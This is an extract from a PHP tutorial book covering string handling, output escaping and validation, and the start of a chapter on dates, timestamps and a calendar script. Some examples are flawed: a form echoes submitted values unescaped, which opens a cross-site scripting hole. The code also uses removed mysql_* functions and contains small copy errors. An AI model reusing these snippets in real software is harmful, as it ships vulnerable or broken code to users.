
Notice that we output a single letter from the string using array notation. That code
will output the following:

 H<br />e<br />l<br />l<br />o<br /> <br />W<br />o<br />r<br />l

 ➥<br />d<br />!<br />


This ability to treat strings as arrays only goes so far, though. You can’t, for example,
pass a string to one of PHP’s array functions.


How do I output strings safely?
The most common activity you will perform with strings is to output them.
Whether you’re outputting strings to a browser or to a database, you’ll need to be
careful to encode the strings properly. Some string data has special meaning and
may, to take a best-case scenario, obscure the output; in the worst case, outputting
the wrong string data can cause security vulnerabilities.

Solution
When outputting a string to a browser, we must consider several aspects:

■ Are you outputting a URL inside an <a> tag?
■ Are you outputting to an HTML form element?
■ Do you want to show, or remove any HTML?
■ Do you need to preserve formatting?

Let’s look at an example:

 <?php

 $text = "Ben & Jerrys Ice Cream";

 echo '<a href="/buy/' . rawurlencode($text) . '">Buy ' .

     htmlentities($text) . '</a>';

 ?>



Here, the $text variable string contains an ampersand (&) which we need to escape.
We need to perform two separate actions on the text in order to escape the ampersand
in the two places where it is used. Firstly, we need to use rawurlencode function
to convert the ampersand and spaces to a valid URL string. The second operation
80   The PHP Anthology

     uses the htmlentities to turn the ampersand into a valid HTML entity because “&”
     is a special character in HTML (and XML).

     The resulting HTML looks like this:

      <a href="/buy/Ben%20%26%20Jerrys%20Ice%20Cream">

      ➥Buy Ben &amp; Jerrys Ice Cream</a>


     In the URL string, the ampersand has been replaced with %26, and spaces by %20,
     and the ampersand in the link text has been replaced by &amp;.

     More considerations arise when you’re outputting strings as a means to prepopulate
     form fields—perhaps you want to display default data, display user input for con­
     firmation purposes, or deal with an error. Again, the htmlentities function gets
     the job done:

      <?php

      $quote = '"So long, and thanks for all the fish!"';

      ?>


      <input type="text" name="fave_quote"

          value="<?php echo htmlentities($quote); ?>" />



     If we use the htmlentities function, we can ensure that the value will display
     without any issues, even though it contains double quotes. Here is the output of
     the above code:

      <input type="text" name="fave_quote"

          value="&quot;So long, and thanks for all the fish!&quot;" />



     The quotes have been transformed to the HTML entity &quot;.

     When we’re inserting data into a database, it’s considered best practice to insert the
     data without any escaping transformations intended for output, such as those we
     just used in transforming strings to HTML. This practice ensures that you can change
     the output format at will. However, when we insert data into a database we must
     escape certain characters to ensure that the data doesn’t interfere with the query
     itself, and to prevent SQL injection attacks. How you escape the data you insert
     depends on your choice of database; for MySQL, for example, we use the
     mysql_real_escape_string function.
Strings    81

Take a look at this example of some code-escaping string data submitted via a hypo­
thetical form:

 <?php

 $first_name = mysql_real_escape_string($_POST['first_name']);

 $last_name = mysql_real_escape_string($_POST['first_name']);

 $fave_quote = mysql_real_escape_string($_POST['fave_quote']);

 $sql = "INSERT INTO my_table (first_name, last_name, fave_quote)

 ➥ VALUES ('$first_name', '$last_name', '$fave_quote')";
 ⋮ proceed with query: mysql_query($sql);
 echo $sql

 ?>



Use of the mysql_real_escape_string function ensures that no matter what the
user submits through our form, it won’t break the SQL we’re trying to execute—it
neither causes an error nor allows the user to execute unwanted SQL. Other database
management systems have their own specific string escaping functions, too. For
example, if you use PostgreSQL or SQLite, you can use pg_escape_string and
sqlite_escape_string respectively. PDO users can use PDOStatement->bindParam
or the PDO->quote method, which are discussed in “How do I protect my web site
from an SQL injection attack?” in Chapter 2.


How do I preserve formatting?
Imagine you want to output an email to a web page, but in doing so, you want to
preserve the formatting of the email—retaining the line breaks. Does PHP have a
handy string function available?

Solutions
You have a choice of two simple approaches to ensure that text formatting is pre­
served on a web page. Firstly, and most simply, you can enclose your text within
a <pre> tag. Alternatively, if you don’t want to risk breaking the page layout on long
lines, you can convert newline characters to <br /> tags using the nl2br function.

You may have a piece of HTML like this:
82   The PHP Anthology


      <p>Dear Sir or Madam,

      This is my nicely formatted letter. I hope that it really impresses

      ➥ you.

      Look! I've started a new paragraph.

      Yours faithfully,

      Mike Format</p>



     As you probably know, your user will see the following result when this HTML is
     output:

      Dear Sir or Madam, This is my nicely formatted letter. I hope that

      ➥ it really impresses you. Look! I've started a new paragraph. Yours
      ➥ faithfully, Mike Format


     But by applying the nl2br function, we can ensure users will see the text as it was
     formatted:

      <p>Dear Sir or Madam,<br />

      This is my nicely formatted letter. I hope that it really impresses

      ➥ you.<br />

      <br />

      Look! I've started a new paragraph.<br />

      Yours faithfully,<br />

      Mike Format</p>




     How do I strip HTML tags from text?
     If you allow your site to be updated by the general public, it’s important to prevent
     the use of HTML—you want to prevent visitors from posting markup that interferes
     with your site’s layout.

     Solution
     The PHP function strip_tags handles this job almost perfectly. Given some text,
     strip_tags will eliminate anything that looks like an HTML tag. To be more exact,
     strip_tags removes any block of text that begins with < and ends with >, while
     everything other than the tags is left exactly as it was. Here’s a simple example:
Strings    83


    <?php

    $text = 'This is <b>bold</b> and this is <i>italic</i>. What about

    ➥ this <a href="http://www.php.net/">link</a>?';

    echo strip_tags($text);

    ?>



This results in the following output:

    This is bold and this is italic. What about this link?



You can also supply strip_tags with a list of allowed tags that you want it to ignore.
Let’s alter the above example slightly:

    echo strip_tags($text, '<b><i>');



This time, strip_tags will ignore the <b> and <i> tags and strip the rest, producing
the following output:

    This is <b>bold</b> and this is <i>italic</i>. What about this link?



Discussion
As you can see, strip_tags leaves the text between opening and closing tags un­
touched. If it finds a < character but fails to find a matching > character, it will re­
move all the text to the end of the string.

Even though it’s the recommended solution, removing HTML with strip_tags does
not guarantee that your site will be safe from potential harm to its layout. By allowing
certain tags that you consider to be safe for visitors to use, you give visitors the po­
tential to use attributes in those tags—such as style—which can cause problems
with your site’s layout. Worse still, the submission of JavaScript contained in a link
can result in a cross-site scripting (XSS) security exploit. For more information on
XSS and how to prevent it, see the solutions on Chris Shiflett’s site,2 as well as
WikiBlog’s page on XSS prevention.3




2
    http://shiflett.org/articles/foiling-cross-site-attacks
3
    http://wiki.flux-cms.org/display/BLOG/XSS+Prevention
84   The PHP Anthology


     How do I force text to wrap after
     a certain number of characters?
     One function that most developers find very handy is wordwrap. If you have a long
     string of text that contains no particular formatting, you can use wordwrap to insert
     a character, such as newline character (n), at a specified interval. wordwrap takes
     care not to break up words unless you specifically tell it to. This function can be
     particularly useful when it comes to constructing well-laid-out email messages.

     Solution
     To use wordwrap, we simply pass it a string. wordwrap’s default behavior is to wrap
     the text as close to 75 characters as possible (it won’t break words), inserting a
     newline character (n) at each breakpoint. In this example, we intend to output
     HTML, so we supply two extra arguments to change this default behavior:

      <?php

      $string = "This is a long sentence that will be cut at sixty

      ➥ characters automatically. Don't worry,
      ➥ no words will be broken up.";

      echo wordwrap($string, 60, "<br />");

      ?>



     With this call, wordwrap wraps the text at 60 characters, and inserts <br /> tags
     instead of newline characters. Here’s what it outputs:

      This is a long sentence that will be cut at sixty characters<br />

      ➥automatically. Don't worry, no words will be broken up.


     Thus, we’ve wrangled this unwieldy sentence into something far more manage­
     able—without breaking any of the words.


     How do I perform advanced
     search and replace operations?
     PHP comes with a powerful collection of string functions that can be used for search
     and replace operations. Your first glance at the relevant manual pages on the PHP
     web site may suggest that these functions are simple, but with a little cunning,
Strings    85

there’s much you can accomplish with them.4 The functions str_replace, strpos,
and substr_replace are three such examples—they appear simple at first, but we
can use them to accomplish complex tasks. str_replace replaces all occurrences
of one string in another, strpos returns the position of the first occurrence of one
string in another, and substr_replace replaces text within a portion of a string.

Solutions
The easiest way to search and replace text is using the str_replace function. Let’s
consider the following code:

    <?php

    $word = 'general-purpose';

    $text = <<<EOD

    PHP (recursive acronym for "PHP: Hypertext Preprocessor")

     is a widely used Open Source general-purpose scripting language.

    EOD;

    echo str_replace($word, '<strong>' . $word . '</strong>', $text);

    ?>



The above example performs a very simple search and replace operation that helps
us add HTML markup to text. In this case, the string “general-purpose” in the text
is wrapped with a <strong> tag, and produces the following output:

    PHP (recursive acronym for "PHP: Hypertext Preprocessor")

     is a widely used Open Source <strong>general-purpose</strong>

    ➥ scripting language.


The substr_replace function provides control over how text is to be replaced, but
to use it, we need to specify the location and length of the replacement. For example,
if we only wanted to find the first instance of the text we wanted to replace, we
could try this:




4
    http://www.php.net/strings/
86   The PHP Anthology


      <?php

      function addTag($text, $word, $tag)

      {

        $length = strlen($word);

        $start = strpos($text, $word);

        $word   = '<' . $tag . '>' . $word . '</' . $tag . '>';

        return substr_replace($text, $word, $start, $length);

      }

      $text = <<<EOD

      PHP (recursive acronym for "PHP: Hypertext Preprocessor")

       is a widely used Open Source general-purpose scripting language.

      EOD;

      echo addTag($text, 'general-purpose', 'strong');

      ?>



     Here we’ve created a function, addTag, which wraps an HTML tag around the first
     occurrence of a specified word. To perform this task using substr_replace, we
     have to find the length of the word, using strlen, and its position within the text,
     using strpos.

     substr_replace is very flexible. If you specify a negative value for the $start argu­
     ment, it will begin the replacement operation counting from the end of the text in­
     stead of the beginning. The $length argument, which represents how much of the
     original text to replace, is optional. If this argument is omitted, the whole string is
     replaced. If it’s set to zero, no text is replaced—the replacement string is inserted
     into the text at the location specified by the $start parameter. A negative value
     setting represents the number of characters from the end of the text at which it will
     stop the replacement operation.


     How do I break up text
     into an array of lines?
     Let’s say that you have information contained within a string value that you’d like
     to split up into separate values, such as a list of tags separated by commas, or a list
     of items separated by newline characters. What’s the best way to complete this task?

     Solution
     If we assume that our piece of text contains line feed characters, we can use the
     explode function to break it up into an array of lines:
Strings   87


 <?php

 $text = <<<EOD

 This will be row 1

 This will be row 2

 This will be row 3

 This will be row 4

 EOD;

 $lines = explode(PHP_EOL, $text);

 echo '<table border="1">' .PHP_EOL;

 foreach ($lines as $line)

 {

   echo '<tr>' .PHP_EOL. '<td>' .$line. '</td>' .PHP_EOL. '</tr>' .

       PHP_EOL;

 }

 echo '</table>' .PHP_EOL;

 ?>



This script uses explode to break the text at the line feed characters and place the
text into an array. The PHP_EOL constant—the current operating system’s end of line
(EOL) character—is used for the line feed character to make the script more portable.
The array is then used to build an HTML table, which you can see in Figure 3.1.




                        Figure 3.1. Using explode to output text as a table


Discussion
It’s useful to know that the implode function does exactly the opposite of what
we’ve seen here—it builds a string out of an array. Let’s add the following line to
the above example:

 echo implode($lines, PHP_EOL);



Here’s the resulting output of our original string:
88   The PHP Anthology


      This   will   be   row   1

      This   will   be   row   2

      This   will   be   row   3

      This   will   be   row   4




     How do I trim whitespace from text?
     When we’re dealing with form submissions, among other tasks, we often need to
     consider whitespace. Sometimes it’s submitted by the user in error—it is hard to
     see, after all. It may also be submitted on purpose by users who want to avoid filling
     in fields, for example.

     The presence of whitespace in submitted data can cause problems for your applic­
     ation—the erroneous inclusion of whitespace could result in the storage of incorrect
     usernames or email addresses, for instance—so it’s useful to be able to trim the
     whitespace from submitted form values.

     Solution
     The trim function is another handy PHP tool. It removes whitespace characters at
     the start and end of strings, and works like this:

      <?php

      $string = ' This has whitespace at both ends               ';

      // Remove that whitespace

      $string = trim($string);

      if (strlen($string) > 0) {

        ⋮ It's not just spaces…
      }

      ?>



     This straightforward function allows us to make sure that a user can’t send us spaces
     instead of real data. If we merely want to trim whitespace from the left- or right-
     hand side of a string, we can use ltrim or rtrim respectively.


     How do I output formatted text?
     In certain situations text needs to be formatted in a specific way—when we’re
     working with prices, column alignments, and dates, for example.
Strings    89


Solution
The powerful printf and sprintf functions output a formatted string according
to special formatting directives, the former displaying the output to the screen, the
latter to a string. Formatting directives take the form of a % character followed by
one or more directive elements. Here’s an example:

 <?php

 $fruit = array('banana', 'mango', 'pear');

 $price = array('30', '50', '35');

 $format = 'A %s costs %d cents.<br />';

 for ($i = 0; $i < 3; $i++)

 {

   printf($format, $fruit[$i], $price[$i]);

 }

 ?>



This script produces the following output:

 A banana costs 30 cents.

 A mango costs 50 cents.

 A pear costs 35 cents.



In this example, $format contains special characters, %s and %d, which printf and
sprintf recognize and replace with the values we supply as arguments. The argu­
ments are swapped with values in the same order in which they’re passed to the
function: %s will format a value as a string and %d will format the value as a number.
To vary the order in which the values appear in the output, we can simply change
the format string without having to change the order of the arguments passed to the
printf or sprintf functions. Let’s use the array of values from the first example,
but change the output such that the values appear in a different order:

 $format = '%2$d cents will buy you a %1$s.<br />';

 for ($i = 0; $i < 3; $i++)

 {

   printf($format, $fruit[$i], $price[$i]);

 }



The %2$d format character will format the second argument as a number. If you
need to double-quote your format string for the sake of variable interpolation, you’ll
90   The PHP Anthology

     need to escape the $ character. For example, here’s the format string we’d need if
     we wanted to add a newline character, n, at the end:

         $format = "%2$d cents will buy you a %1$s.<br />n";



     These examples are very simple, but formatting directives such as padding, align­
     ment, or floating point precision can be quite complex. For more details, refer to
     the sprintf page in The PHP Manual.5


     How do I validate submitted data?
     Validating strings is an important part of implementing a web page form. How can
     you make sure that the data a user submits through a form is what it’s supposed to
     be—a URL or an email address, for example? The submission of invalid data is a
     very common problem.

     Solution
     The typical approach to validation includes using plenty of regular expressions.
     Fortunately, PEAR::Validate is here to help, so we don’t need to reinvent the wheel.

     PEAR::Validate offers a main class for validating strings and values that are common
     to web applications, as well as a growing number of related internationalized classes
     for dealing with country-specific requirements like UK postcodes and social security
     numbers for residents of the USA. Each class contains a collection of static methods
     (methods that can be called without constructing an object from the class) that are
     used to validate a particular value.

     Here’s how we might use three of the methods available in the main Validate
     class—namely string, email, and url—to validate the data received through a
     form:

                                                                pear_validate.php (excerpt)

         error_reporting(E_ALL);
         require_once 'strip_quotes.php';
         require_once 'Validate.php';



     5
         http://www.php.net/sprintf/
Strings    91


 $errors = array('name' => '', 'email' => '', 'url' => '');

 if (isset($_POST['submit']))

 {

   $name_options = array(

       'format'     => VALIDATE_ALPHA . VALIDATE_SPACE,

       'min_length' => 5

   );

   if (!Validate::string($_POST['name'], $name_options))

   {

     $errors['name'] = ' class="error"';

   }

   if (!Validate::email($_POST['email']))

   {

     $errors['email'] = ' class="error"';

   }

   if (!Validate::url($_POST['url']))

   {

     $errors['url'] = ' class="error"';

   }

 }




First, we turn off E_STRICT error reporting with the error_reporting function be­
cause the PEAR::Validate will generate E_STRICT errors. You can read more about
this and other error-handling topics in Chapter 9.

Next, we include strip_quotes.php and the PEAR::Validate package. strip_quotes.php
contains code that handles magic quotes (which you can read more about in the
section called “Checking for Magic Quotes” in Chapter 1). We also create an array
in the $errors variable to store the results of the field validation. Then, having
tested to see that the form was submitted, we call the validate methods statically
to check the fields. The first check ascertains that the data in the name field is a
string containing only letters from the alphabet or space characters, and is at least
five characters long—this validation requirement is a custom requirement, and we
define it with our $name_options array.

Next, we simply need to call the methods Validate::email and Validate::url in
order to check the email and url fields submitted via the form. Note that if we pass
the value true as the second argument, PEAR::Validate checks the existence of
the specified host name against DNS, using PHP’s checkdnsrr function. Note also
92   The PHP Anthology

     that this validation causes a time delay as the host communicates with the nearest
     DNS server.

     In our $errors array, we store an empty string if the validation passes, and ‘
     class="error"' if the validation fails. We insert this string into our form’s <label>
     tags. The addition of ‘ class="error"' to the label elements allows us to provide
     to users some visual feedback via CSS to indicate a validation error.

     Here’s the code for the form itself:

                                                                pear_validate.php (excerpt)

      <form class="userinfo"
          action="<?php echo $_SERVER['SCRIPT_NAME']; ?>" method="post">
        <?php
          $name = isset($_POST['name']) ? $_POST['name'] : '';
          $email = isset($_POST['email']) ? $_POST['email'] : '';
          $url = isset($_POST['url']) ? $_POST['url'] : '';
        ?>
        <legend>Enter your details</legend>
        <div>
          <label<?php echo $errors['name']; ?>>Name:</label>
          <span>
            <input type="text" name="name"
                value="<?php echo $name; ?>" />
          </span>
        </div>
        <div>
          <label<?php echo $errors['email']; ?>>Email:</label>
          <span>
            <input type="text" name="email"
                value="<?php echo $email; ?>" />
          </span>
        </div>
        <div>
          <label<?php echo $errors['url']; ?>>Website:</label>
          <span>
            <input type="text" name="url"
                value="<?php echo $url; ?>" />
          </span>
        </div>
        <div>
          <span>
            <input type="submit" name="submit" value="send" />
Strings    93


     </span>

   </div>

 </form>




When it’s viewed in a browser, the form will look something like Figure 3.2.




                        Figure 3.2. The form displaying before validation


When we rebuild the form after submission, we use the $errors array and some
CSS to highlight form labels with red:

                                                                        pear_validate.php (excerpt)

 .error {
   color: red;
   font-weight: bold;
 }



This lets users know which part of the input was invalid, as shown in Figure 3.3.
94   The PHP Anthology




                                      Figure 3.3. The form displaying after validation


     Of course, merely changing the color of the labels to red is not very informative;
     you can improve this example by adding field validation messages to let users know
     exactly how to fix the validation problems.

     Discussion
     Validating user input and communicating errors to the user is one of the most vital
     tasks you will perform as a web developer. Of course, if PEAR::Validate is simply
     too complex for your needs, you may find the built-in ctype_* functions are more
     to your liking.6

     Just remember: in the interests of security, it’s imperative that you validate all user
     input, and that you escape it before outputting it as HTML or saving it to your
     database.


     Summary
     You should now have a good idea of what can be achieved with PHP’s normal string
     functions. If you can get by just using those, do so—they’re fast and easy to use, and
     are far less prone to error than are regular expressions.

     String manipulation is the core of what we PHP developers do. From user input to
     application output—HTML to a browser, SQL to a database—knowing how to handle
     strings safely, securely, and efficiently is one of the most important skills a PHP
     professional can have.

     6
         http://www.php.net/c_type/
4
                                                  Chapter




Dates and Times
Wouldn’t it be nice if we had a ten-day week? How about 100 minutes in an hour?
Ten months each year?

Dates and times are probably something you take for granted. You deal with them
every day and are probably unaware of the clever mathematical algorithms your
brain uses to anticipate how long you have to wait before Friday evening comes
around again. It’s only when you start programming with dates and times that you
realize that what you’ve taken for granted all these years is not so easy to deal with
in code. Blame it on the Romans!

In our day-to-day lives, we’re used to working with decimal (base ten) numbers,
which are optimized for dealing with groups of ten (ten ones in ten, ten tens in a
hundred, ten hundreds in a thousand, and so on). I’ll avoid giving you a math lecture,
but basically the problem with dates and times is that they don’t break down neatly
into groups of ten. Consider this:

■ In one second you have one thousand milliseconds. No problem.
■ In one minute you have 60 seconds.
■ In one hour you have 60 minutes.
96   The PHP Anthology

     ■	 In one day you have 24 hours.

     So, how do you calculate the number of days given a value in milliseconds? That’s
     a stack of long division! And that’s just time—what about dates?

     ■	 In one week, you have seven days (does your week begin on Sunday or Monday?).
     ■	 In one month you have … er … you don’t know exactly how many days or weeks;
        it depends on the month (and let’s not get started on leap years!).
     ■	 In one year, you have 12 months.

     Of course, that’s easy enough. How about making it more difficult? You often need
     to be able to express a date in multiple formats such as “Tuesday 18th March, 2003,”
     “03/18/03” (USA format), “18/03/03” (European format), “18th Mar 2003,” and
     “20030318” (a MySQL-style timestamp), not to forget “1047942000” (a Unix
     timestamp)!

     How do you plan to display a list of articles fetched from a database and ordered
     by date? What if you want to present something more complex, such as an online
     calendar?

     As you can see, there’s a lot to think about when working with dates and times in
     your applications. Fortunately, PHP really helps when it comes to making times
     and dates as painless as possible, thanks to powerful functions like date, but it’s
     important to develop the right strategy for dealing with dates and times early in
     your career as a PHP programmer. Take the right approach from day one, and you’ll
     avoid having to go back later and write insanely complex code to fix the mistakes
     you made as a newbie. In this chapter, we’ll be looking at the kinds of strategies
     you can employ, and solving some of the common problems you’ll face when it
     comes to programming dates and times.


     How do I use Unix timestamps?
     Timestamps are numbers that identify dates and times in a format that can be used
     to solve the types of problems you’ll typically encounter in your applications; they
     make it easier to perform operations such as ordering a list or comparing two dates.
     As a PHP developer, you’re likely to come across two types of timestamps: Unix
     timestamps and MySQL (or other database management system) timestamps.
Dates and Times      97

Unix timestamps are generally the most effective format in which to represent and
manipulate date and time values—they’re a simple solution to a tricky problem. A
Unix timestamp reflects the number of seconds that have passed since the epoch:
January 1, 1970, 00:00:00 GMT. Converting dates to their Unix timestamps makes
date- and time-related calculations easy in PHP. Let’s have a look at how they work.

Solution
PHP provides functions such as time and mktime to help us deal with Unix
timestamps. time will return the current time as a Unix timestamp. The global
variable $_SERVER['REQUEST_TIME'] will return the timestamp of the current request
from PHP 5.1. mktime will return a timestamp for a specified date. We use mktime
like this:

 $timestamp = mktime($hour, $minute, $second, $month, $day, $year);



Discussion
The downside of Unix timestamps is that, unless you’re some kind of savant, they’re
not human-readable. If I was to tell you that 1047994036 was the number of seconds
that had passed since January 1, 1970, how fast could you tell me what the date
was?

The other problem with Unix timestamps is that they can only be used within a
limited date range, depending on your operating system. On Linux-based systems,
you should be able to go back to somewhere around 1902, and forward as far as
2037. On Windows-based operating systems, the oldest date may be as recent as
January 1, 1970. The problem lies in the size of the number used to represent the
time value. Any operating system can easily handle integer numbers up to a certain
size ( 4,294,967,296 for current 32-bit operating systems), after which it must work
harder to juggle oversized numbers.

For the sake of efficiency, therefore, operating systems usually impose this “maxim­
um” size on important values like dates and times. Linux, at least, allows you to
have negative integer values for dates; it’ll let you work with dates occurring before
January 1, 1970, while PHP on Windows may complain about such dates. Moreover,
on the flip side of this issue, another potentially Y2K-like problem that will affect
all 32-bit operating systems still in existence looms over the date January 19, 2038.
98   The PHP Anthology

     Perform a Google search for that date and you’ll see what I mean. Although 2038 is
     a long way off and the timestamp issue may influence no more than your choice of
     pacemaker, it’s worth bearing this glitch in mind if you’re planning an application
     that will need to work with dates from the distant past or future (perhaps on a history
     web site). To see the problem in action, try running the following script on as many
     different operating systems as you can:

      <?php

      echo '1st Jan 1899: '        .   mktime(0,   0,   0,   1,    1,    1899)   .   '<br   />';

      echo '1st Jan 1902: '        .   mktime(0,   0,   0,   1,    1,    1902)   .   '<br   />';

      echo '31st Dec 1969: '       .   mktime(0,   0,   0,   12,   31,   1969)   .   '<br   />';

      echo '1st Jan 1790: '        .   mktime(0,   0,   0,   1,    1,    1970)   .   '<br   />';

      echo '1st Jan 1937: '        .   mktime(0,   0,   0,   1,    1,    2037)   .   '<br   />';

      echo '1st Jan 2038: '        .   mktime(0,   0,   0,   1,    1,    2038)   .   '<br   />';

      echo '19th Jan 2038: '       .   mktime(0,   0,   0,   1,    19,   2038)   .   '<br   />';

      echo '20th Jan 2038: '       .   mktime(0,   0,   0,   1,    20,   2038)   .   '<br   />';

      echo '1st Jan 2039: '        .   mktime(0,   0,   0,   1,    19,   2039)   .   '<br   />';

      ?>



     Depending on your operating system—it’s a particular problem on Windows—this
     example may generate a range of different PHP warning errors.

     Another aspect to be aware of when you’re dealing with Unix timestamps is that
     they vary in length; a timestamp from January 2, 1970 will obviously be shorter
     than a contemporary timestamp. In general, a column size of 11 (INT(11)) should
     be more than enough to keep your application running for the next few hundred
     years (assuming it’s not running on a 32-bit operating system, of course) when you
     place Unix timestamps in your database.


     How do I obtain the current date?
     Simple as it may seem, obtaining the current date can soon become tricky. With a
     multitude of possible client and server timezones and daylight-saving time shifts
     in action at any given point in time, you can see how this exercise can quickly be­
     come more complicated than it first appears.
Dates and Times      99


Solution
The simplest way to obtain the current date according to your server is to use the
time function. time returns a Unix timestamp for the current date. We can use the
date function to format that date for human consumption:


 <?php

 $timestamp = time();

 echo date("F jS, Y", $timestamp); // November 7th, 2006

 ?>



The first argument to date is a series of placeholders that specify the format for the
date. The most common placeholders can be seen in Table 4.1. If you fail to specify
a timestamp argument, date defaults to the current date.

Discussion
A problem with simply calling the time function is that the time returned is that
of the server’s timezone—not your or your visitor’s timezone. To address this
problem, we can use the date.timezone setting in php.ini or the
date_default_timezone_set function, which will change the timezone for all date-
related functions:

 <?php

 $timestamp = time();

 echo date("F jS, Y", $timestamp) . '<br />'; // August 24th, 2007

 date_default_timezone_set('America/New_York');

 echo date("F jS Y H:i:s") . '<br />'; // August 24th, 2007 03:06:29

 date_default_timezone_set('Africa/Cairo');

 echo date("F jS Y H:i:s"); // August 24th, 2007 10:06:29

 ?>
100   The PHP Anthology

      Table 4.1. Most Common Placeholders

           Placeholder                                        Description

                d           day of the month, two digits with leading zeros


                D           a textual representation of a day, three letters


                j           day of the month without leading zeros


          l (lowercase L)   a full textual representation of the day of the week

                S           English ordinal suffix for the day of the month, two characters

                F           a full textual representation of a month, such as January or March

                m           numeric representation of a month, with leading zeros

                M           a short textual representation of a month, three letters

                n           numeric representation of a month, without leading zeros

                t           number of days in the given month

                L           whether or not it’s a leap year

                Y           a full numeric representation of a year, four digits

                y           a two-digit representation of a year

                a           lowercase am or pm

                A           uppercase AM or PM

                g           12-hour format of an hour without leading zeros

                G           24-hour format of an hour without leading zeros

                h           12-hour format of an hour with leading zeros

                H           24-hour format of an hour with leading zeros

                i           minutes with leading zeros

                s           seconds with leading zeros

           I (capital i)    whether or not the date is in daylight saving time

                O           difference to Greenwich time (GMT) in hours

                P           difference to Greenwich time (GMT) with colon between hours and minutes
                            (added in PHP 5.1.3)

                T           timezone setting of this machine
Dates and Times      101


How do I find a day of the week?
We arrange our lives by the days of the week. When we humans talk about dates,
we often use phrases like “next Tuesday” or “last Wednesday.” It’s easier for us to
understand dates this way than, say reading a date and having to work out that it
means next Tuesday. So, given any date, say “May 31st 1984,” in an arbitrary format,
how can we easily determine the day of the week this date represents?

Solution
Rather than trying to write a complex parser to convert our date to a timestamp,
and then performing complex mathematics to subtract the number of seconds that
have occurred since the date and so forth, we simply pass the date to the strtotime
function. The strtotime function has a seemingly limitless ability to understand
dates and convert them automatically to a Unix timestamp, which we can then use
with the date function and the l (lowercase L) placeholder. Here’s strtotime in
action:

 <?php

 $timestamp = strtotime("May 31st 1984");

 $weekday = date("l", $timestamp);

 echo $weekday; // Thursday

 ?>




How do I find the number
of days in a month?
A common task, especially when writing date-based applications such as calendars,
is to find the number of days in a month. And don’t forget that tricky month—Feb­
ruary! Fortunately, it’s easy to obtain the number of days in a month using PHP.

Solution
We use the strtotime function and the date function, with the t placeholder, to
gain this information easily:
102   The PHP Anthology


          <?php

          $timestamp = strtotime("October");

          $days = date("t", $timestamp);

          echo $days; // 31

          ?>




      How do I create a calendar?
      There comes a time in the lives of all developers when they encounter the intimid­
      ating task of creating a calendar of some description. Knowing where to begin is
      often the first hurdle.

      Solution
      As you’re probably beginning to discern from our previous discussion, strtotime
      is a very powerful function. In fact, you’ve seen only a small portion of its abilities
      so far. As well as calendar dates, strtotime allows you to pass in more arbitrary,
      human-readable expressions, such as +1 week, next friday, last saturday or
      even +1 year 6 months 38 days 15 hours 26 minutes 12 seconds. By utilizing
      strtotime’s impressive capabilities, and with a little help from PEAR’s
                                                                                            1
      HTML_Table_Matrix class, we can create a simple calendar with remarkable ease.
      Let’s get started:

                                                                               calendar.php (excerpt)

          error_reporting(E_ALL);
          require_once "HTML/Table/Matrix.php";
          define("EMPTY_COLUMN", "");



      First, we turn off E_STRICT error reporting with the error_reporting function be­
      cause PEAR::HTML_Table_Matrix will generate E_STRICT errors—you can read more
      about this and other error-handling topics in Chapter 9. Next, we include the
      HTML_Table_Matrix package, and define a constant, EMPTY_COLUMN, in order to make
      our code more readable.

      Next, we perform validation on the month-and-year values:


      1
          You can read all about HTML_Table_Matrix at
      http://pear.php.net/package/HTML_Table_Matrix/docs/1.0.5/HTML_Table_Matrix/HTML_Table_Matrix.html.
Dates and Times      103

                                                                calendar.php (excerpt)

 $months = array("January", "February", "March",
      "April", "May", "June", "July",
      "August", "September", "October",
      "November", "December");
 if (isset($_GET['month']) && in_array($_GET['month'], $months))
 {
    $month = $_GET['month'];
 }
 else
 {
   $month = date("F");
 }
 if (isset($_GET['year']) &&
      is_numeric($_GET['year']) &&
      $_GET['year'] >= 1970 &&
      $_GET['year'] <= 2038)
 {
    $year = $_GET['year'];
 }
 else
 {
    $year = date("Y");
 }



Above, we defined an array of allowed values for the $month variable. This is our
whitelist, which is used to make sure a valid month is passed. If no value, or an
invalid value is passed, we use the current month. To complete our input validation,
we make sure that the $_GET['year'] value is between 1970 and 2038. Again, if
no value or an invalid value is passed, we use the current year.

The next step is to get the timestamps for the first day and the last day of the given
month in the given year:

                                                                calendar.php (excerpt)

 $start_date = strtotime("$month 1st $year");
 $end_date = strtotime("$month " .date("t", $start_date). " $year");



We then create an array of numbers that represent the first to the last day of the
month:
104   The PHP Anthology

                                                                      calendar.php (excerpt)

       $date_range = range(1, date("t", $start_date));



      Here, we use the -1 month and +1 month modifiers to create timestamps for the
      previous and next months, and do the same for the previous and next years:

                                                                      calendar.php (excerpt)

       $previous_month = strtotime("-1 month", $start_date);
       $next_month = strtotime("+1 month", $start_date);
       $previous_year = strtotime("-1 year", $start_date);
       $next_year = strtotime("+1 year", $start_date);



      To make life simpler and to avoid duplication, we use sprintf and the following
      string formatter to create the links that will allow users to move backward and for­
      ward by one year or one month:

                                                                      calendar.php (excerpt)

       $html = "<a href='" . $_SERVER['SCRIPT_NAME'] .
           "?month=%s&amp;year=%s'>%s</a>";



      Next, we start to create an array that represents our calendar. Here we construct our
      first table row, which consists of a link to show the previous year. This is followed
      by text that represents the current year being viewed, and finally, a link to show
      the next year. We use the EMPTY_COLUMN constant to denote columns that should be
      left empty:

                                                                      calendar.php (excerpt)

       if (date("Y", $previous_year) >= 1970)
       {
         $calendar_data[] = sprintf($html, date("F", $start_date),
             date("Y", $previous_year), date("Y", $previous_year));
       }
       else
       {
         $calendar_data[] = EMPTY_COLUMN;
       }
Dates and Times      105



 $calendar_data[]     =   EMPTY_COLUMN;

 $calendar_data[]     =   EMPTY_COLUMN;

 $calendar_data[]     =   date("Y", $start_date);

 $calendar_data[]     =   EMPTY_COLUMN;

 $calendar_data[]     =   EMPTY_COLUMN;


 if (date("Y", $next_year) < 2038 && date("Y", $next_year) != 1969)

 {

   $calendar_data[] = sprintf($html, date("F", $start_date),

       date("Y", $next_year), date("Y", $next_year));

 }

 else

 {

   $calendar_data[] = EMPTY_COLUMN;

 }




The next row is similar to the previous one, except that it shows links for the previ­
ous month, followed by the currently viewed month and the link for the next month,
in that order:

                                                                calendar.php (excerpt)

 $calendar_data[] = sprintf($html, date("F", $previous_month),
     date("Y", $previous_month), date("M", $previous_month));
 $calendar_data[] = EMPTY_COLUMN;
 $calendar_data[] = EMPTY_COLUMN;
 $calendar_data[] = date("M", $start_date);
 $calendar_data[] = EMPTY_COLUMN;
 $calendar_data[] = EMPTY_COLUMN;
